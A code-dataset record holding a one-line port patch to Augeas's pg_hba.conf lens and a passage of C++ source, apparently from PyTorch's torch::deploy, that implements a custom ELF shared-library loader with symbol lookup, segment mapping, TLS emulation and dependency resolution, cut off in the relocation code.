--- lenses/pg_hba.aug.orig 2018-03-08 17:37:53 UTC +++ lenses/pg_hba.aug @@ -81,6 +81,7 @@ module Pg_Hba = (* View: filter The pg_hba.conf conf file *) let filter = (incl "/var/lib/pgsql/data/pg_hba.conf" . + incl "%%PREFIX%%/pgsql/data/pg_hba.conf" . incl "/var/lib/pgsql/*/data/pg_hba.conf" . incl "/var/lib/postgresql/*/data/pg_hba.conf" . incl "/etc/postgresql/*/*/pg_hba.conf" )
Augeas
2
jrmarino/ravensource
bucket_61/augeas/patches/patch-lenses_pg__hba.aug
[ "FTL" ]
// Code in this file is a heavily modified version of the dynamic loader // from android's bionic library. Here is the license for that project: /* * Copyright (C) 2016 The Android Open Source Project * All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS * "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT * LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS * FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE * COPYRIGHT OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, * INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, * BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS * OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED * AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, * OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT * OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #include <dlfcn.h> #include <elf.h> #include <fcntl.h> #include <libgen.h> #include <link.h> #include <sys/mman.h> #include <sys/stat.h> #include <sys/types.h> #include <unistd.h> #include <atomic> #include <cerrno> #include <cinttypes> #include <climits> #include <cstdint> #include <cstring> #include <functional> #include <iostream> #include <sstream> #include <stdexcept> #include <thread> #include <vector> // Get PAGE_SIZE and PAGE_MASK. #include <sys/user.h> #include <c10/util/Optional.h> #include <c10/util/irange.h> #include <fmt/format.h> #include <torch/csrc/deploy/loader.h> namespace torch { namespace deploy { #define DEPLOY_ERROR(msg_fmt, ...) \ throw DeployLoaderError(fmt::format(msg_fmt, ##__VA_ARGS__)) #define DEPLOY_CHECK(cond, fmt, ...) \ if (!(cond)) { \ DEPLOY_ERROR(fmt, ##__VA_ARGS__); \ } std::vector<std::string> split_path(const std::string& s, char delim) { const char* cur = s.c_str(); const char* end = cur + s.size(); if (cur == end) { return {}; } std::vector<std::string> result; while (true) { // non-zero amount of chars const char* next = strchr(cur, delim); if (!next) { result.emplace_back(std::string(cur, end)); break; } result.emplace_back(std::string(cur, next)); cur = next + 1; } return result; } // https://stackoverflow.com/questions/23006930/the-shared-library-rpath-and-the-binary-rpath-priority/52647116#52647116 void replace_all( std::string& str, const std::string& from, const std::string& to) { if (from.empty()) return; size_t start_pos = 0; while ((start_pos = str.find(from, start_pos)) != std::string::npos) { str.replace(start_pos, from.length(), to); start_pos += to.length(); // In case 'to' contains 'from', like replacing // 'x' with 'yx' } } std::string resolve_path(const std::string& origin, const std::string& t) { std::string result = t; replace_all(result, "$ORIGIN", origin); // NOLINTNEXTLINE char buf[PATH_MAX]; char* resolved = realpath(result.c_str(), buf); if (!resolved) { return result; } return resolved; } std::string resolve_origin(const std::string& so_name) { // NOLINTNEXTLINE char origin[PATH_MAX]; realpath(so_name.c_str(), origin); dirname(origin); return origin; } template <typename... Args> std::string stringf(const char* format, Args... args) { int size_s = snprintf(nullptr, 0, format, args...); std::string result(size_s + 1, 0); snprintf((char*)result.data(), size_s + 1, format, args...); return result; } // Returns the address of the page containing address 'x'. #define PAGE_START(x) ((x)&PAGE_MASK) // Returns the offset of address 'x' in its page. #define PAGE_OFFSET(x) ((x) & ~PAGE_MASK) // Returns the address of the next page after address 'x', unless 'x' is // itself at the start of a page. #define PAGE_END(x) PAGE_START((x) + (PAGE_SIZE - 1)) // from bionic // returns the size a shared library will take in memory size_t phdr_table_get_load_size( const Elf64_Phdr* phdr_table, size_t phdr_count, Elf64_Addr* out_min_vaddr, Elf64_Addr* out_max_vaddr) { Elf64_Addr min_vaddr = UINTPTR_MAX; Elf64_Addr max_vaddr = 0; bool found_pt_load = false; for (const auto i : c10::irange(phdr_count)) { const Elf64_Phdr* phdr = &phdr_table[i]; if (phdr->p_type != PT_LOAD) { continue; } found_pt_load = true; if (phdr->p_vaddr < min_vaddr) { min_vaddr = phdr->p_vaddr; } if (phdr->p_vaddr + phdr->p_memsz > max_vaddr) { max_vaddr = phdr->p_vaddr + phdr->p_memsz; } } if (!found_pt_load) { min_vaddr = 0; } min_vaddr = PAGE_START(min_vaddr); max_vaddr = PAGE_END(max_vaddr); if (out_min_vaddr != nullptr) { *out_min_vaddr = min_vaddr; } if (out_max_vaddr != nullptr) { *out_max_vaddr = max_vaddr; } return max_vaddr - min_vaddr; } #define MAYBE_MAP_FLAG(x, from, to) (((x) & (from)) ? (to) : 0) #define PFLAGS_TO_PROT(x) \ (MAYBE_MAP_FLAG((x), PF_X, PROT_EXEC) | \ MAYBE_MAP_FLAG((x), PF_R, PROT_READ) | \ MAYBE_MAP_FLAG((x), PF_W, PROT_WRITE)) // holds a pre-computed hash for a string that is used in a GNU-style hash // tables and also keeps track of the string length. struct GnuHash { GnuHash(const char* name) { uint32_t h = 5381; const uint8_t* name_bytes = reinterpret_cast<const uint8_t*>(name); #pragma unroll 8 while (*name_bytes != 0) { h += (h << 5) + *name_bytes++; // h*33 + c = h + h * 32 + c = h + h << 5 + c } hash = h; name_len = reinterpret_cast<const char*>(name_bytes) - name; } uint32_t hash; uint32_t name_len; }; // this is a special builtin in the libc++ API used for telling C++ execption // frame unwinding about functions loaded from a pathway other than the libc // loader. it is passed a pointer to where the EH_FRAME section was loaded, // which appears to include frame information relative to that address. extern "C" void __register_frame(void*); extern "C" void __deregister_frame(void*); // Memory maps a file into the address space read-only, and manages the lifetime // of the mapping. Used in the loader to read in initial image, and to inspect // ELF files for dependencies before callling dlopen. struct MemFile { MemFile(const char* filename_) : fd_(0), mem_(nullptr), n_bytes_(0) { fd_ = open(filename_, O_RDONLY); DEPLOY_CHECK( fd_ != -1, "failed to open {}: {}", filename_, strerror(errno)); struct stat s = {0}; if (-1 == fstat(fd_, &s)) { close(fd_); // destructors don't run during exceptions DEPLOY_ERROR("failed to stat {}: {}", filename_, strerror(errno)); } n_bytes_ = s.st_size; mem_ = mmap(nullptr, n_bytes_, PROT_READ, MAP_SHARED, fd_, 0); if (MAP_FAILED == mem_) { close(fd_); DEPLOY_ERROR("failed to mmap {}: {}", filename_, strerror(errno)); } } MemFile(const MemFile&) = delete; const char* data() const { return (const char*)mem_; } ~MemFile() { if (mem_) { munmap((void*)mem_, n_bytes_); } if (fd_) { close(fd_); } } size_t size() { return n_bytes_; } int fd() const { return fd_; } private: int fd_; void* mem_; size_t n_bytes_; }; typedef void (*linker_dtor_function_t)(); typedef void (*linker_ctor_function_t)(int, const char**, char**); // https://refspecs.linuxfoundation.org/LSB_2.1.0/LSB-Core-generic/LSB-Core-generic/ehframehdr.html // note that eh_frame_ptr can be different types based on eh_frame_ptr_enc but // we only support one sepecific encoding that is stored in a int32_t and an // offset relative to the start of this struct. struct EH_Frame_HDR { char version; char eh_frame_ptr_enc; char fde_count_enc; char table_enc; int32_t eh_frame_ptr; }; // this is the libc++ function called to lookup thread local state. // It is passed a pointer to an object of the same shape as TLSEntry // with the module_id and offset. extern "C" void* __tls_get_addr(void*); extern "C" int __cxa_thread_atexit_impl( void (*dtor)(void*), void* obj, void* dso_symbol); struct CustomLibraryImpl; struct TLSMemory { TLSMemory(std::shared_ptr<CustomLibraryImpl> file, size_t size) // NOLINTNEXTLINE : file_(std::move(file)), mem_(malloc(size)) {} std::shared_ptr<CustomLibraryImpl> file_; void* mem_; ~TLSMemory() { // NOLINTNEXTLINE free(mem_); } }; static void delete_TLSMemory(void* obj) { delete ((TLSMemory*)obj); } // This object performs TLS emulation for modules not loaded by dlopen. // Normally modules have a module_id that is used as a key in libc for the // thread local data for that module. However, there is no public API for // assigning this module id. Instead, for modules that we load, we set module_id // to a pointer to a TLSSegment object, and replace __tls_get_addr with a // function that calls `addr`. // libc module_id's are sequential, so we use the top bit as a flag to see // if we have a local TLSegment object instead. This will break if // someone creates 2^63 sequential objects, but it is hard to imagine // a system with enough RAM to do that. constexpr size_t TLS_LOCAL_FLAG = (1ULL << 63); static void* local__tls_get_addr(TLSIndex* idx); /* LLDB puts a breakpoint in this function, and reads __deploy_module_info to * get debug info from library. */ __attribute__((noinline)) void __deploy_register_code() { std::cout << ""; // otherwise the breakpoint doesn't get hit, not sure if // there is a more stable way of doing this. }; struct DeployModuleInfo { const char* name; Elf64_Addr file_addr; size_t file_size; Elf64_Addr load_bias; }; extern "C" { // NOLINTNEXTLINE DeployModuleInfo __deploy_module_info; } // RAII wrapper around dlopen struct __attribute__((visibility("hidden"))) SystemLibraryImpl : public SystemLibrary { SystemLibraryImpl(void* handle, bool steal) : handle_(handle), own_handle_(steal && handle != RTLD_DEFAULT) {} at::optional<Elf64_Addr> sym(const char* name) const override { void* r = dlsym(handle_, name); if (!r) { return at::nullopt; } return (Elf64_Addr)r; } at::optional<TLSIndex> tls_sym(const char* name) const override; ~SystemLibraryImpl() override { if (own_handle_) { dlclose(handle_); } } private: void* handle_; bool own_handle_; }; std::shared_ptr<SystemLibrary> SystemLibrary::create(void* handle, bool steal) { return std::make_shared<SystemLibraryImpl>(handle, steal); } std::shared_ptr<SystemLibrary> SystemLibrary::create( const char* path, int flags) { void* handle = dlopen(path, flags); return SystemLibrary::create(handle, handle != nullptr); } // reads DT_NEEDED and DT_RUNPATH from an unloaded elf file so we can sort out // dependencies before calling dlopen std::pair<const char*, std::vector<const char*>> load_needed_from_elf_file( const char* filename, const char* data) { auto header_ = (Elf64_Ehdr*)data; auto program_headers = (Elf64_Phdr*)(data + header_->e_phoff); auto n_program_headers = header_->e_phnum; const Elf64_Dyn* dynamic = nullptr; for (const auto i : c10::irange(n_program_headers)) { const Elf64_Phdr* phdr = &program_headers[i]; if (phdr->p_type == PT_DYNAMIC) { dynamic = reinterpret_cast<const Elf64_Dyn*>(data + phdr->p_offset); break; } } DEPLOY_CHECK( dynamic, "{}: could not load dynamic section for looking up DT_NEEDED", filename); const char* runpath = ""; std::vector<const char*> needed; auto segment_headers = (Elf64_Shdr*)(data + header_->e_shoff); size_t n_segments = header_->e_shnum; const char* strtab = nullptr; const char* segment_string_table = data + segment_headers[header_->e_shstrndx].sh_offset; for (const auto i : c10::irange(n_segments)) { const Elf64_Shdr* shdr = &segment_headers[i]; if (shdr->sh_type == SHT_STRTAB && strcmp(".dynstr", segment_string_table + shdr->sh_name) == 0) { strtab = data + shdr->sh_offset; break; } } DEPLOY_CHECK(strtab, "{}: could not load dynstr for DT_NEEDED", filename); for (const Elf64_Dyn* d = dynamic; d->d_tag != DT_NULL; ++d) { switch (d->d_tag) { case DT_NEEDED: // std::cout << "NEEDED: '" << strtab + d->d_un.d_val << "'\n"; needed.push_back(strtab + d->d_un.d_val); break; case DT_RPATH: /* not quite correct, because this is a different order than runpath, but better than not processing it at all */ case DT_RUNPATH: // std::cout << "RUNPATH: '" << strtab + d->d_un.d_val << "'\n"; runpath = strtab + d->d_un.d_val; break; } } return std::make_pair(runpath, std::move(needed)); } // common mechanism for reading the elf symbol table, // and other information in the PT_DYNAMIC segment. struct ElfDynamicInfo { std::string name_; const Elf64_Dyn* dynamic_ = nullptr; Elf64_Addr load_bias_ = 0; const Elf64_Sym* symtab_ = nullptr; const char* strtab_ = nullptr; size_t strtab_size_ = 0; Elf64_Rela* plt_rela_ = nullptr; size_t n_plt_rela_ = 0; Elf64_Rela* rela_ = nullptr; size_t n_rela_ = 0; linker_ctor_function_t init_func_ = nullptr; linker_ctor_function_t* init_array_ = nullptr; linker_dtor_function_t fini_func_ = nullptr; linker_dtor_function_t* fini_array_ = nullptr; size_t n_init_array_ = 0; size_t n_fini_array_ = 0; size_t gnu_nbucket_ = 0; uint32_t* gnu_bucket_ = nullptr; uint32_t* gnu_chain_ = nullptr; uint32_t gnu_maskwords_ = 0; uint32_t gnu_shift2_ = 0; Elf64_Addr* gnu_bloom_filter_ = nullptr; std::string runpath_; std::vector<const char*> needed_; const char* get_string(int idx) { return strtab_ + idx; } void initialize_from_dynamic_section( std::string name, Elf64_Dyn* dynamic, Elf64_Addr load_bias, bool check_absolute) { name_ = std::move(name); load_bias_ = load_bias; dynamic_ = dynamic; for (const Elf64_Dyn* d = dynamic_; d->d_tag != DT_NULL; ++d) { void* addr = (check_absolute && d->d_un.d_ptr > load_bias_) ? reinterpret_cast<void*>(d->d_un.d_ptr) : reinterpret_cast<void*>(load_bias_ + d->d_un.d_ptr); auto value = d->d_un.d_val; switch (d->d_tag) { case DT_SYMTAB: symtab_ = (Elf64_Sym*)addr; break; case DT_STRTAB: strtab_ = (const char*)addr; break; case DT_STRSZ: strtab_size_ = value; break; case DT_JMPREL: plt_rela_ = (Elf64_Rela*)addr; break; case DT_PLTRELSZ: n_plt_rela_ = value / sizeof(Elf64_Rela); break; case DT_RELA: rela_ = (Elf64_Rela*)addr; break; case DT_RELASZ: n_rela_ = value / sizeof(Elf64_Rela); break; case DT_INIT: init_func_ = reinterpret_cast<linker_ctor_function_t>( load_bias_ + d->d_un.d_ptr); break; case DT_FINI: fini_func_ = reinterpret_cast<linker_dtor_function_t>( load_bias_ + d->d_un.d_ptr); break; case DT_INIT_ARRAY: init_array_ = reinterpret_cast<linker_ctor_function_t*>( load_bias_ + d->d_un.d_ptr); break; case DT_INIT_ARRAYSZ: n_init_array_ = static_cast<uint32_t>(d->d_un.d_val) / sizeof(Elf64_Addr); break; case DT_FINI_ARRAY: fini_array_ = reinterpret_cast<linker_dtor_function_t*>( load_bias_ + d->d_un.d_ptr); break; case DT_FINI_ARRAYSZ: n_fini_array_ = static_cast<uint32_t>(d->d_un.d_val) / sizeof(Elf64_Addr); break; case DT_HASH: break; case DT_GNU_HASH: { gnu_nbucket_ = reinterpret_cast<uint32_t*>(addr)[0]; // skip symndx gnu_maskwords_ = reinterpret_cast<uint32_t*>(addr)[2]; gnu_shift2_ = reinterpret_cast<uint32_t*>(addr)[3]; gnu_bloom_filter_ = reinterpret_cast<Elf64_Addr*>((Elf64_Addr)addr + 16); gnu_bucket_ = reinterpret_cast<uint32_t*>(gnu_bloom_filter_ + gnu_maskwords_); // amend chain for symndx = header[1] gnu_chain_ = gnu_bucket_ + gnu_nbucket_ - reinterpret_cast<uint32_t*>(addr)[1]; --gnu_maskwords_; } break; } } if (!gnu_bucket_) { std::cout << fmt::format( "{}: warning, no DT_GNU_HASH found, symbol lookups on this module will not find anything.\n", name_); } // pass 2 for things that require the strtab_ to be loaded for (const Elf64_Dyn* d = dynamic_; d->d_tag != DT_NULL; ++d) { switch (d->d_tag) { case DT_NEEDED: needed_.push_back(get_string(d->d_un.d_val)); break; case DT_RPATH: /* not quite correct, because this is a different order than runpath, but better than not processing it at all */ case DT_RUNPATH: runpath_ = get_string(d->d_un.d_val); break; } } } at::optional<Elf64_Addr> sym( const char* name, GnuHash* precomputed_hash = nullptr) const { if (!gnu_bucket_) { return at::nullopt; // no hashtable was loaded } GnuHash hash_obj = precomputed_hash ? *precomputed_hash : GnuHash(name); auto hash = hash_obj.hash; auto name_len = hash_obj.name_len; constexpr uint32_t kBloomMaskBits = sizeof(Elf64_Addr) * 8; const uint32_t word_num = (hash / kBloomMaskBits) & gnu_maskwords_; const Elf64_Addr bloom_word = gnu_bloom_filter_[word_num]; const uint32_t h1 = hash % kBloomMaskBits; const uint32_t h2 = (hash >> gnu_shift2_) % kBloomMaskBits; if ((1 & (bloom_word >> h1) & (bloom_word >> h2)) != 1) { return at::nullopt; } uint32_t sym_idx = gnu_bucket_[hash % gnu_nbucket_]; if (sym_idx == 0) { return at::nullopt; } uint32_t chain_value = 0; const Elf64_Sym* sym = nullptr; do { sym = symtab_ + sym_idx; chain_value = gnu_chain_[sym_idx]; if ((chain_value >> 1) == (hash >> 1)) { if (static_cast<size_t>(sym->st_name) + name_len + 1 <= strtab_size_ && memcmp(strtab_ + sym->st_name, name, name_len + 1) == 0) { // found the matching entry, is it defined? if (sym->st_shndx != 0) { return sym->st_value + ((ELF64_ST_TYPE(sym->st_info) == STT_TLS) ? 0 : load_bias_); } // symbol isn't defined return at::nullopt; } } ++sym_idx; } while ((chain_value & 1) == 0); return at::nullopt; } }; // for resolving TLS offsets we need to look through // libc's already loaded libraries. We do not have the whole // ELF file mapped in this case just a pointer to the program headers and // the load_bias (offset in memory) where the library was loaded. struct AlreadyLoadedSymTable { private: ElfDynamicInfo dyninfo_; public: AlreadyLoadedSymTable( const char* name, Elf64_Addr load_bias, const Elf64_Phdr* program_headers, size_t n_program_headers) { Elf64_Dyn* dynamic = nullptr; for (const auto i : c10::irange(n_program_headers)) { const Elf64_Phdr* phdr = &program_headers[i]; // Segment addresses in memory. Elf64_Addr seg_start = phdr->p_vaddr + load_bias; if (phdr->p_type == PT_DYNAMIC) { dynamic = reinterpret_cast<Elf64_Dyn*>(seg_start); break; } } DEPLOY_CHECK( dynamic, "%s: couldn't find PT_DYNAMIC in already loaded table.", name); dyninfo_.initialize_from_dynamic_section(name, dynamic, load_bias, true); } at::optional<Elf64_Addr> sym(const char* name) { return dyninfo_.sym(name); } }; static int iterate_cb(struct dl_phdr_info* info, size_t size, void* data) { auto fn = (std::function<int(struct dl_phdr_info * info, size_t size)>*)data; return (*fn)(info, size); } // we need to find a TLS offset / module_id pair for a symbol which we cannot do // with a normal dlsym call. Instead we iterate through all loaded libraries and // check their symbol tables for the symbol. The value of the symbol is the TLS // offset. When we find the library we also get the module id. at::optional<TLSIndex> slow_find_tls_symbol_offset(const char* sym_name) { at::optional<TLSIndex> result = at::nullopt; std::function<int(struct dl_phdr_info*, size_t)> cb = [&](struct dl_phdr_info* info, size_t size) { // std::cout << "SEARCHING .. " << info->dlpi_name << "\n"; AlreadyLoadedSymTable symtable( info->dlpi_name, info->dlpi_addr, info->dlpi_phdr, info->dlpi_phnum); auto sym_addr = symtable.sym(sym_name); if (sym_addr) { // std::cout << "FOUND IT IN: " << info->dlpi_name << " it has modid: // " << info->dlpi_tls_modid << "\n"; result = TLSIndex{info->dlpi_tls_modid, *sym_addr}; return 1; } return 0; }; dl_iterate_phdr(iterate_cb, (void*)&cb); return result; } at::optional<TLSIndex> SystemLibraryImpl::tls_sym(const char* name) const { if (!sym(name)) { return at::nullopt; // before we do a bunch of slow lookups to find the // module_id, check that this even defines the symbol } if (handle_ == RTLD_DEFAULT) { return slow_find_tls_symbol_offset(name); } struct link_map* lm = nullptr; DEPLOY_CHECK( 0 == dlinfo(handle_, RTLD_DI_LINKMAP, &lm), "failed to query dlinfo"); std::cout << "TLS dlinfo LOOKUP " << lm->l_name << " " << name << " " << "\n"; ElfDynamicInfo info; info.initialize_from_dynamic_section(lm->l_name, lm->l_ld, lm->l_addr, true); auto r = info.sym(name); if (r) { size_t module_id = 0; DEPLOY_CHECK( 0 == dlinfo(handle_, RTLD_DI_TLS_MODID, &module_id), "failed to query dlinfo for module_id"); return TLSIndex{module_id, *r}; } return at::nullopt; } // dlopen does not accept additional search paths as an argument. // however, normal DT_NEEDED library load inherits the runpath of parents. // So we need to pre-find all the libraries and call dlopen on them directly to // get the same behavior. We can find the dependencies by reading the libraries // dynamic section for recursive DT_NEEED entries. void resolve_needed_libraries( std::vector<std::shared_ptr<SymbolProvider>>& libraries, const std::string& origin_relative, std::vector<std::string>& search_path, const std::string& runpath_template, const std::vector<const char*>& needed) { size_t search_path_start_size = search_path.size(); std::string origin = resolve_origin(origin_relative); std::vector<std::string> paths = split_path(runpath_template, ':'); // backwards because we want paths to be search in order but we search // search_path backward for (size_t i = paths.size(); i > 0; --i) { search_path.emplace_back(resolve_path(origin, paths[i - 1])); } for (const char* name : needed) { // std::cout << "ATTEMPTING FIND " << name << "\n"; if (strcmp(name, "libtorch_python.so") == 0) { // torchvision expects it... continue; } // find the library, either (1) it is already loaded, // (2) it is an absolute path that exists, // (3) we find it in the search path // (4) we can dlopen it // (1) the library is already loaded const int base_flags = RTLD_LAZY | RTLD_LOCAL; void* handle = dlopen(name, base_flags | RTLD_NOLOAD); if (handle) { // std::cout << "ALREADY LOADED " << name << "\n"; libraries.emplace_back(SystemLibrary::create(handle, true)); continue; } std::string library_path = ""; // (2) it is an absolute path if (strchr(name, '/') != nullptr) { library_path = name; } else { // (3) find it in the search path for (size_t i = search_path.size(); i > 0; --i) { std::stringstream ss; ss << search_path[i - 1] << "/" << name; if (access(ss.str().c_str(), F_OK) == 0) { library_path = ss.str(); break; } } } std::vector<std::shared_ptr<SymbolProvider>> sublibraries; // these need to say loaded until we open library_path // otherwise we might dlclose a sublibrary if (library_path != "") { // std::cout << "LOOKING FOR SUBLIBRARIES FOR FILE AT PATH " << // library_path << "\n"; we found the actual file, recursively load its // deps before opening it so we resolve their paths correctly MemFile image(library_path.c_str()); auto search = load_needed_from_elf_file(library_path.c_str(), image.data()); resolve_needed_libraries( sublibraries, library_path, search_path, search.first, search.second); } else { library_path = name; } // either we didn't find the file, or we have already loaded its deps // in both cases, we now try to call dlopen. In the case where we didn't // find the file, we hope that something like LD_LIBRARY_PATH knows where it // is. In the case where we found it, we know its deps are loaded and // resolved. // std::cout << "OPENING " << library_path << "\n"; handle = dlopen(library_path.c_str(), base_flags); DEPLOY_CHECK( handle, "{}: could not load library, dlopen says: {}", name, dlerror()); libraries.emplace_back(SystemLibrary::create(handle, true)); } // unwind search_path stack search_path.erase( search_path.begin() + search_path_start_size, search_path.end()); } // NOLINTNEXTLINE extern "C" void* __dso_handle; struct __attribute__((visibility("hidden"))) CustomLibraryImpl : public std::enable_shared_from_this<CustomLibraryImpl>, public CustomLibrary { CustomLibraryImpl(const char* filename, int argc, const char** argv) : contents_(filename), mapped_library_(nullptr), name_(filename), argc_(argc), argv_(argv) { pthread_key_create(&tls_key_, nullptr); data_ = contents_.data(); header_ = (Elf64_Ehdr*)data_; program_headers_ = (Elf64_Phdr*)(data_ + header_->e_phoff); n_program_headers_ = header_->e_phnum; } void add_search_library(std::shared_ptr<SymbolProvider> lib) override { symbol_search_path_.emplace_back(std::move(lib)); } void check_library_format() { DEPLOY_CHECK( 0 == memcmp(header_->e_ident, ELFMAG, SELFMAG), "{}: not an ELF file", this->name_); DEPLOY_CHECK( header_->e_type == ET_DYN, "{}: is not shared object file", this->name_); DEPLOY_CHECK( header_->e_ident[EI_CLASS] == ELFCLASS64, "{}: is not ELF64 format", this->name_); DEPLOY_CHECK( header_->e_ident[EI_DATA] == ELFDATA2LSB, "{}: is not 2's complement, little endian", this->name_); DEPLOY_CHECK( header_->e_machine == EM_X86_64, "{}: is not in x86_64 format", this->name_); } void reserve_address_space() { Elf64_Addr min_vaddr = 0; Elf64_Addr max_vaddr = 0; mapped_size_ = phdr_table_get_load_size( program_headers_, n_program_headers_, &min_vaddr, &max_vaddr); mapped_library_ = mmap( nullptr, mapped_size_, PROT_NONE, MAP_PRIVATE | MAP_ANONYMOUS, -1, 0); load_bias_ = (const char*)mapped_library_ - reinterpret_cast<const char*>(min_vaddr); } void load_segments() { // from bionic for (const auto i : c10::irange(n_program_headers_)) { const Elf64_Phdr* phdr = &program_headers_[i]; // Segment addresses in memory. Elf64_Addr seg_start = phdr->p_vaddr + load_bias_; Elf64_Addr seg_end = seg_start + phdr->p_memsz; switch (phdr->p_type) { case PT_DYNAMIC: dynamic_ = reinterpret_cast<Elf64_Dyn*>(seg_start); break; case PT_GNU_EH_FRAME: eh_frame_hdr_ = reinterpret_cast<EH_Frame_HDR*>(seg_start); DEPLOY_CHECK( eh_frame_hdr_->eh_frame_ptr_enc == 0x1b, "unsupported eh_frame_pointer_enc {}", eh_frame_hdr_->eh_frame_ptr_enc); eh_frame_ = (void*)((int64_t)&eh_frame_hdr_->eh_frame_ptr + eh_frame_hdr_->eh_frame_ptr); break; case PT_TLS: tls_file_size_ = phdr->p_filesz; tls_mem_size_ = phdr->p_memsz; tls_initalization_image_ = (void*)seg_start; break; }; if (phdr->p_type != PT_LOAD) { continue; } Elf64_Addr seg_page_start = PAGE_START(seg_start); Elf64_Addr seg_page_end = PAGE_END(seg_end); Elf64_Addr seg_file_end = seg_start + phdr->p_filesz; // File offsets. Elf64_Addr file_start = phdr->p_offset; Elf64_Addr file_end = file_start + phdr->p_filesz; Elf64_Addr file_page_start = PAGE_START(file_start); Elf64_Addr file_length = file_end - file_page_start; if (contents_.size() <= 0) { DEPLOY_ERROR( "\"{}\" invalid file size: {}", name_.c_str(), contents_.size()); } if (file_end > contents_.size()) { DEPLOY_ERROR( "invalid ELF file \"{}\" load segment[{}]:" " p_offset ({}) + p_filesz ({}) ( = {}) past end of file " "({})", name_.c_str(), i, reinterpret_cast<void*>(phdr->p_offset), reinterpret_cast<void*>(phdr->p_filesz), reinterpret_cast<void*>(file_end), contents_.size()); } if (file_length != 0) { int prot = PFLAGS_TO_PROT(phdr->p_flags); void* seg_addr = mmap64( reinterpret_cast<void*>(seg_page_start), file_length, prot | PROT_WRITE, // initially everything is writable to do // relocations MAP_FIXED | MAP_PRIVATE, contents_.fd(), file_page_start); fixup_prot_.emplace_back([=]() { mprotect(reinterpret_cast<void*>(seg_page_start), file_length, prot); }); if (seg_addr == MAP_FAILED) { DEPLOY_ERROR( "couldn't map \"{}\" segment {}: {}", name_.c_str(), i, strerror(errno)); } } // if the segment is writable, and does not end on a page boundary, // zero-fill it until the page limit. if ((phdr->p_flags & PF_W) != 0 && PAGE_OFFSET(seg_file_end) > 0) { memset( reinterpret_cast<void*>(seg_file_end), 0, PAGE_SIZE - PAGE_OFFSET(seg_file_end)); } seg_file_end = PAGE_END(seg_file_end); // seg_file_end is now the first page address after the file // content. If seg_end is larger, we need to zero anything // between them. This is done by using a private anonymous // map for all extra pages. if (seg_page_end > seg_file_end) { size_t zeromap_size = seg_page_end - seg_file_end; int prot = PFLAGS_TO_PROT(phdr->p_flags); void* zeromap = mmap( reinterpret_cast<void*>(seg_file_end), zeromap_size, prot | PROT_WRITE, MAP_FIXED | MAP_ANONYMOUS | MAP_PRIVATE, -1, 0); fixup_prot_.emplace_back([=]() { mprotect(reinterpret_cast<void*>(seg_file_end), zeromap_size, prot); }); if (zeromap == MAP_FAILED) { DEPLOY_ERROR( "couldn't zero fill \"{}\" gap: {}", name_.c_str(), strerror(errno)); } } } } size_t module_id() const { size_t this_as_number = (size_t)this; return this_as_number | TLS_LOCAL_FLAG; } void read_dynamic_section() { dyninfo_.initialize_from_dynamic_section( name_, dynamic_, load_bias_, false); std::vector<std::string> empty_search_path; resolve_needed_libraries( symbol_search_path_, name_, empty_search_path, dyninfo_.runpath_, dyninfo_.needed_); } at::optional<Elf64_Addr> lookup_symbol(Elf64_Xword r_info) { const uint32_t r_type = ELF64_R_TYPE(r_info); const uint32_t r_sym = ELF64_R_SYM(r_info); if (r_sym == 0) { return (Elf64_Addr)0; } auto sym_st = dyninfo_.symtab_[r_sym]; const char* sym_name = dyninfo_.get_string(sym_st.st_name); if (r_type == R_X86_64_JUMP_SLOT) { if (strcmp(sym_name, "__tls_get_addr") == 0) { return (Elf64_Addr)local__tls_get_addr; } if (strcmp(sym_name, "__cxa_thread_atexit") == 0) { return (Elf64_Addr)__cxa_thread_atexit_impl; } } for (const auto& sys_lib : symbol_search_path_) { auto r = sys_lib->sym(sym_name); if (r) { return r; } } auto r = sym(sym_name); if (r) { return r; } if (ELF64_ST_BIND(sym_st.st_info) != STB_WEAK) { DEPLOY_ERROR( "{}: '{}' symbol not found in ElfFile lookup", name_.c_str(), sym_name); } return at::nullopt; } at::optional<TLSIndex> tls_lookup_symbol(Elf64_Xword r_info) { const uint32_t r_sym = ELF64_R_SYM(r_info); if (r_sym == 0) { return TLSIndex{ module_id(), 0}; // note: offset is not queried when the symbol is blank } auto sym_st = dyninfo_.symtab_[r_sym]; const char* sym_name = dyninfo_.get_string(sym_st.st_name); for (const auto& sys_lib : symbol_search_path_) { auto r = sys_lib->tls_sym(sym_name); if (r) { return r; } } auto r = tls_sym(sym_name); if (r) { return r; } if (ELF64_ST_BIND(sym_st.st_info) != STB_WEAK) { DEPLOY_ERROR( "{}: '{}' symbol not found in ElfFile lookup", name_.c_str(), sym_name); } return at::nullopt; } void relocate_one(const Elf64_Rela& reloc) { const uint32_t r_type = ELF64_R_TYPE(reloc.r_info); if (r_type == 0) { return; } void* const rel_target = reinterpret_cast<void*>(reloc.r_offset + load_bias_); // TLS relocations need to lookup symbols differently so we can get the // module_id if (r_type == R_X86_64_DTPMOD64 || r_type == R_X86_64_DTPOFF64) { auto tls_index = tls_lookup_symbol(reloc.r_info); if (!tls_index) { return; // skip weak relocation that wasn't found } switch (r_type) { case R_X86_64_DTPMOD64: *static_cast<size_t*>(rel_target) = tls_index->module_id; break; case R_X86_64_DTPOFF64: *static_cast<Elf64_Addr*>(rel_target) = tls_index->offset + reloc.r_addend; break; } return; } auto sym_addr = lookup_symbol(reloc.r_info); if (!sym_addr) { return; // skip weak relocation that wasn't found } switch (r_type) { case R_X86_64_JUMP_SLOT: case 